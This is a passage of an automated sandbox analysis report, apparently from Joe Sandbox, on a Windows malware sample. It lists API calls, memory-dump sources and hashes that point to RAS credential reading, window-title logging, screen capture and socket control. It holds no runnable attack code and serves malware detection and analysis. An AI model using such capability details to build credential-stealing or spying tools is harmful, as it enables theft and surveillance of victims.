                                • CloseHandle.KERNEL32(00000000), ref: 10004FAF
                                • CreateThread.KERNEL32(00000000,00000000,Function_00004DC0,00000000,00000000,00000000), ref: 10004FD8
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                                • String ID:
                                • API String ID: 772126777-0
                                • Opcode ID: 6963211a604a5b15fbd72f10532032c652b07b21011d2a556fd3fd40579641c8
                                • Instruction ID: 074d757184539b64c9d175ae26cd748b0207da95c97c991421b52f25c974b03f
                                • Opcode Fuzzy Hash: 6963211a604a5b15fbd72f10532032c652b07b21011d2a556fd3fd40579641c8
                                • Instruction Fuzzy Hash: FB2106723043155BE328DB389C85B2A76E2FBC4760F66462DFA52A72D0CEF4EC04C618
                                APIs
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 10002C48
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 10002C51
                                • ??2@YAPAXI@Z.MSVCRT(000003E8), ref: 10002C78
                                • ??2@YAPAXI@Z.MSVCRT(00000020,000003E8), ref: 10002C82
                                • ??2@YAPAXI@Z.MSVCRT(000003E8,00000020,000003E8), ref: 10002C8D
                                • ??2@YAPAXI@Z.MSVCRT(00000020,000003E8,00000020,000003E8), ref: 10002C97
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??2@$CreateEvent
                                • String ID:
                                • API String ID: 747899935-0
                                • Opcode ID: 4a89f466c376dbb1b068e75c919d489d1edda17e83e2f925ebc477eae31192d0
                                • Instruction ID: a50fb07bf8c1123475231c099c298c4878f8277ca68681ab5e841357f648eb1a
                                • Opcode Fuzzy Hash: 4a89f466c376dbb1b068e75c919d489d1edda17e83e2f925ebc477eae31192d0
                                • Instruction Fuzzy Hash: 04215EB0900B449FD324CF6AC884557FBF8FF48348750892EE1898BB11E7B6E845CB54
                                APIs
                                • GetVersionExA.KERNEL32 ref: 00402DF3
                                • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00402E28
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402E88
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3257874536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000003.00000002.3254439993.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3264508159.0000000000406000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3268423591.0000000000407000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3276394847.000000000042E000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000003.00000002.3281553731.0000000000430000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                Similarity
                                • API ID: EnvironmentFileModuleNameVariableVersion
                                • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                • API String ID: 1385375860-4131005785
                                • Opcode ID: d32aba8153413fb79f22db8816aa953c0611f4f7a567bdac4acef65ff769318a
                                • Instruction ID: 6320224d0c2d352184b776b6ceda42ea704a1604693acbb24f6c53f50b478bf9
                                • Opcode Fuzzy Hash: d32aba8153413fb79f22db8816aa953c0611f4f7a567bdac4acef65ff769318a
                                • Instruction Fuzzy Hash: D231577188025869EB30D630EE49BDB37689B02708F2400FBD245F52C2E3BD8E998B59
                                APIs
                                • wsprintfA.USER32 ref: 1000743C
                                  • Part of subcall function 100071B0: LsaOpenPolicy.ADVAPI32(00000000,?,00000004,?), ref: 100071D2
                                • LsaFreeMemory.ADVAPI32(?), ref: 1000746A
                                • LsaFreeMemory.ADVAPI32(?), ref: 10007494
                                  • Part of subcall function 10007240: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,00000000), ref: 10007279
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: FreeMemory$ByteCharMultiOpenPolicyWidewsprintf
                                • String ID: L$_RasDefaultCredentials#0$RasDialParams!%s#0
                                • API String ID: 3354934605-1591505386
                                • Opcode ID: 069507318d07fdd3591eeedcd7f3e9026eb01116497707671abf5df464a27a46
                                • Instruction ID: 47a45ef77663ef483bee348490e5c8beabf349d216bd41400619d6b49833efe8
                                • Opcode Fuzzy Hash: 069507318d07fdd3591eeedcd7f3e9026eb01116497707671abf5df464a27a46
                                • Instruction Fuzzy Hash: 662180799083119BE318DF68C89096BB3E9FBC8740F00892DF98993340D678E988CBD1
                                APIs
                                • CreateFileA.KERNEL32(00000021,40000000,00000002,00000000,00000003,00000080,00000000,?,00000001), ref: 1000904C
                                • SetFilePointer.KERNEL32(00000000,?,?,00000000,?,00000001), ref: 1000905D
                                • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,00000001), ref: 10009077
                                • CloseHandle.KERNEL32(00000000,?,00000001), ref: 1000907E
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandlePointerWrite
                                • String ID: p
                                • API String ID: 3604237281-2181537457
                                • Opcode ID: bcc1cd4cbb62ecbc575abc8427f350afb3af9461df4ed93e73f2b520365a0fe5
                                • Instruction ID: e36ba735aa5967a60d40e1ff6ea43c2d8375e51feaec2a2a75f8885a5be44a60
                                • Opcode Fuzzy Hash: bcc1cd4cbb62ecbc575abc8427f350afb3af9461df4ed93e73f2b520365a0fe5
                                • Instruction Fuzzy Hash: CE11CE71244312ABE300DF54CC85F6BB7E9EFD9714F040A1DF6449B2D0E7B4A9098BA2
                                APIs
                                  • Part of subcall function 1000D440: RtlEnterCriticalSection.NTDLL(?), ref: 1000D448
                                  • Part of subcall function 1000D440: RtlLeaveCriticalSection.NTDLL(?), ref: 1000D462
                                • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 1000D4C6
                                • GetProcAddress.KERNEL32(00000000,closesocket), ref: 1000D4D4
                                • FreeLibrary.KERNEL32(00000000), ref: 1000D4E6
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalLibrarySection$AddressEnterFreeLeaveLoadProc
                                • String ID: closesocket$ws2_32.dll
                                • API String ID: 2819327233-181964208
                                • Opcode ID: fa73705bdcf92b9203618bcc10ca7097f6834da9e5e7f852be07f6072b9ccad8
                                • Instruction ID: 00068fa8fe7e3d5c1250a0fa65b0051220447006da9e6c79012b2ada544fa8ed
                                • Opcode Fuzzy Hash: fa73705bdcf92b9203618bcc10ca7097f6834da9e5e7f852be07f6072b9ccad8
                                • Instruction Fuzzy Hash: 4FF0EC36004B21ABE210EF389C85D9F7798EFC9762F004719FB4096240CB74E905C7B6
                                APIs
                                • GetStartupInfoA.KERNEL32(?), ref: 00403AD6
                                • GetFileType.KERNEL32(00000800), ref: 00403B7C
                                • GetStdHandle.KERNEL32(-000000F6), ref: 00403BD5
                                • GetFileType.KERNEL32(00000000), ref: 00403BE3
                                • SetHandleCount.KERNEL32 ref: 00403C1A
                                Memory Dump Source
                                • Source File: 00000003.00000002.3257874536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.3254439993.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.3264508159.0000000000406000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.3268423591.0000000000407000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.3276394847.000000000042E000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000003.00000002.3281553731.0000000000430000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                Similarity
                                • API ID: FileHandleType$CountInfoStartup
                                • String ID:
                                • API String ID: 1710529072-0
                                • Opcode ID: 77ec292723b799dc4d9b58e1807d0efb76a35c9d561ca0d753548a00766590b6
                                • Instruction ID: 31f96ad768a7b34329c178f01d9d2c09c0530c6e7952056691baff74689cfdd4
                                • Opcode Fuzzy Hash: 77ec292723b799dc4d9b58e1807d0efb76a35c9d561ca0d753548a00766590b6
                                • Instruction Fuzzy Hash: 805114316046404BD7208F2CCC447667FB8FB1172AF55463AE8A6EB2E2D77CE949C719
                                APIs
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,1006A0F1,000000FF,1000F405,?,?,?,?,?,?,1006A100,000000FF), ref: 1000F283
                                • CloseHandle.KERNEL32(?,?,?,1006A0F1,000000FF,1000F405,?,?,?,?,?,?,1006A100,000000FF), ref: 1000F28D
                                • ??2@YAPAXI@Z.MSVCRT(00000110,?,?,1006A0F1,000000FF,1000F405,?,?,?,?,?,?,1006A100,000000FF), ref: 1000F2B1
                                • ??2@YAPAXI@Z.MSVCRT(00000110,?,?,1006A0F1,000000FF,1000F405,?,?,?,?,?,?,1006A100,000000FF), ref: 1000F2E2
                                  • Part of subcall function 1000FB90: LoadCursorA.USER32(00000000,00000000), ref: 1000FC53
                                • ??2@YAPAXI@Z.MSVCRT(00000110,?,?,1006A0F1,000000FF,1000F405,?,?,?,?,?,?,1006A100,000000FF), ref: 1000F309
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??2@$CloseCursorHandleLoadObjectSingleWait
                                • String ID:
                                • API String ID: 1916621575-0
                                • Opcode ID: 1eb705cd905c0f146ef5bf02cb5afe729e58b6fb5cf2b9490db994987b313b70
                                • Instruction ID: b70eef93bc3be5527f367b70327705cb0ffa67acdb31b1760f540c4c307e6a46
                                • Opcode Fuzzy Hash: 1eb705cd905c0f146ef5bf02cb5afe729e58b6fb5cf2b9490db994987b313b70
                                • Instruction Fuzzy Hash: FC31C1B0B04741ABE320DF348C52B5BBAE1EB45750F000A2CF2969BAD1DBB1E5488792
                                APIs
                                • CreateDIBSection.GDI32(10010206,?,00000000,10010206,00000000,00000000), ref: 1001042E
                                • SelectObject.GDI32(?,00000000), ref: 1001043D
                                • BitBlt.GDI32(?,?,?,?,?,?,?,?,?), ref: 1001045A
                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 1001047A
                                • DeleteObject.GDI32(?), ref: 100104A2
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Object$CreateDeleteSectionSelect
                                • String ID:
                                • API String ID: 3188413882-0
                                • Opcode ID: 6914c3d10498faa931e45aa64833eb2ce3589ba839e4f727551740e0ed738175
                                • Instruction ID: 86756e093dbd4203ef58af1e2a4b75b8c92c1fe1a1b021b6ca6aa4606f99d77a
                                • Opcode Fuzzy Hash: 6914c3d10498faa931e45aa64833eb2ce3589ba839e4f727551740e0ed738175
                                • Instruction Fuzzy Hash: 7231D5B6200705AFE214CF59CC85E27F7AAFB88710F108A1DFA5587791C7B1F9408BA0
                                APIs
                                • GetForegroundWindow.USER32(?), ref: 10009906
                                • GetWindowTextA.USER32(00000000,1007E2FC,00000400), ref: 1000991C
                                • lstrlen.KERNEL32(1007E2FC), ref: 10009951
                                • GetLocalTime.KERNEL32(?), ref: 10009964
                                • wsprintfA.USER32 ref: 100099B9
                                  • Part of subcall function 100097A0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100097B4
                                  • Part of subcall function 100097A0: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 1000986B
                                  • Part of subcall function 100097A0: GetFileSize.KERNEL32(00000000,00000000), ref: 1000987E
                                  • Part of subcall function 100097A0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 10009892
                                  • Part of subcall function 100097A0: lstrlen.KERNEL32(?), ref: 100098A0
                                  • Part of subcall function 100097A0: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 100098A9
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Windowlstrlen$??2@CreateDirectoryForegroundLocalPointerSizeSystemTextTimewsprintf
                                • String ID:
                                • API String ID: 1247169605-0
                                • Opcode ID: 1df0067ec9095a37b7ec69bcb802230090b704360ccb88951738f67c71e14fa4
                                • Instruction ID: 4f7ab4636ff0803a810951040c387652c581d68020769500fe1f8d2c0b4bc754
                                • Opcode Fuzzy Hash: 1df0067ec9095a37b7ec69bcb802230090b704360ccb88951738f67c71e14fa4
                                • Instruction Fuzzy Hash: FB21A1B12052636BE304CB18CC95A6776AAEF8C300F408A38F281D76A1D67C9D498659
                                APIs
                                • Sleep.KERNEL32(00000064), ref: 100113C1
                                • LocalAlloc.KERNEL32(00000040,?), ref: 10011403
                                • ReadFile.KERNEL32(?,00000000,?,00000000,00000000), ref: 1001141C
                                • Sleep.KERNEL32(00000001,00000000,00000000), ref: 10011431
                                • LocalFree.KERNEL32(00000000), ref: 10011434
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: LocalSleep$AllocFileFreeRead
                                • String ID:
                                • API String ID: 175009107-0
                                • Opcode ID: bf2ef6bc8ebea7897a9c7f3b59668ea674f0e4ecd9d9d3187eed418d19d2a9dc
                                • Instruction ID: 73315cb63eaab40e7695a76611e533bd3f9cb332f13e7bafef01b234fadabf49
                                • Opcode Fuzzy Hash: bf2ef6bc8ebea7897a9c7f3b59668ea674f0e4ecd9d9d3187eed418d19d2a9dc
                                • Instruction Fuzzy Hash: 42211D71204352ABE304DF65CC85FAB77EDEB88B00F00491CB755EA284D7B0E9488B76
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 10012A58
                                • GetThreadDesktop.USER32(00000000), ref: 10012A5F
                                • GetUserObjectInformationA.USER32(?,00000002,?,00000100,?), ref: 10012A80
                                • SetThreadDesktop.USER32(?), ref: 10012A94
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Thread$Desktop$CurrentInformationObjectUser
                                • String ID:
                                • API String ID: 3041254040-0
                                • Opcode ID: 556f9f34ce626c626d025b5ad994241f14c7a72d7fb554adc5a2ad2683bfa424
                                • Instruction ID: b6529946467a443cafd68ee4fafc1a010a5a5dac77649d55f7b29be3a82e6d96
                                • Opcode Fuzzy Hash: 556f9f34ce626c626d025b5ad994241f14c7a72d7fb554adc5a2ad2683bfa424
                                • Instruction Fuzzy Hash: A0F059B12003606BF3109729DCC9BEF3769EF84725F804035F640C2050FBF889C581A2
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleeplstrlenwsprintf
                                • String ID: Host$SYSTEM\CurrentControlSet\Services\%s
                                • API String ID: 1736695411-3973614608
                                • Opcode ID: 8131760f708bed2bd4ce06e64e052545d9e5e77d913a46266ffcad926d35ad94
                                • Instruction ID: 42bb8f1d3cbc34b1093e393aafb0570189901e8aeaae8089c09646219bf79e8e
                                • Opcode Fuzzy Hash: 8131760f708bed2bd4ce06e64e052545d9e5e77d913a46266ffcad926d35ad94
                                • Instruction Fuzzy Hash: A9F0E2B5500321BFF320AB54DC49FEB3BA9DFC4308F004818FB48A6191D2B56989C6E7
                                APIs
                                • setsockopt.WS2_32(?,0000FFFF,00000080,00000000), ref: 10003DDA
                                • CancelIo.KERNEL32(?), ref: 10003DE7
                                • InterlockedExchange.KERNEL32(?,00000000), ref: 10003DF6
                                • closesocket.WS2_32(?), ref: 10003E03
                                • SetEvent.KERNEL32(?), ref: 10003E10
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                • String ID:
                                • API String ID: 1486965892-0
                                • Opcode ID: dd51bebf1240dcd95c78d2e4838092bba280de6a908707723a9b60bc76aba793
                                • Instruction ID: 5bdee382e423177a237ef2210d66a0bf4d0f96213256af2b3b43e88352a19dbf
                                • Opcode Fuzzy Hash: dd51bebf1240dcd95c78d2e4838092bba280de6a908707723a9b60bc76aba793
                                • Instruction Fuzzy Hash: 86F01275204751BFE7248B70CC88F9777A9AF49711F104A1DF69A462D0CFB0A8489756
                                APIs
                                • CoCreateInstance.OLE32(10077218,00000000,00000001,10077188,?), ref: 10068D70
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateInstance
                                • String ID: FriendlyName
                                • API String ID: 542301482-3623505368
                                • Opcode ID: 376f0a869480533741e609f354106b8f4a325d2b9cf872eab34320efc47df62d
                                • Instruction ID: afc3467e9830297f3d24d847b1d2bb17e406cd0b2032fd1a6252cdea2ef9d69a
                                • Opcode Fuzzy Hash: 376f0a869480533741e609f354106b8f4a325d2b9cf872eab34320efc47df62d
                                • Instruction Fuzzy Hash: 6B4118B1204341AFD610CF54CD84F5BB7E9FBC9B24F108A18B599DB290DB75E905CB62
                                APIs
                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000D0FB
                                • DeleteFileA.KERNEL32(?), ref: 1000D1A8
                                  • Part of subcall function 1000CF40: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000CF72
                                  • Part of subcall function 1000CF40: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 1000D029
                                  • Part of subcall function 1000CF40: GetFileSize.KERNEL32(00000000,00000000), ref: 1000D038
                                  • Part of subcall function 1000CF40: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 1000D041
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$DirectorySystem$??2@CreateDeleteSize
                                • String ID: .key$XXXXXX
                                • API String ID: 2930496114-2601115946
                                • Opcode ID: 618e3a8066daa58dc8d3c319f89987d837cd6fe4a550a7d12166253bdad2604e
                                • Instruction ID: 92a9d9676dfbc10a34597c778cdfdecbd90440fd8d0599ce9f46a22b4502f86a
                                • Opcode Fuzzy Hash: 618e3a8066daa58dc8d3c319f89987d837cd6fe4a550a7d12166253bdad2604e
                                • Instruction Fuzzy Hash: 5B310436A005085BD728DAB888527AEBB96FB84770F14036EFA27872C0DFF45D458290
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
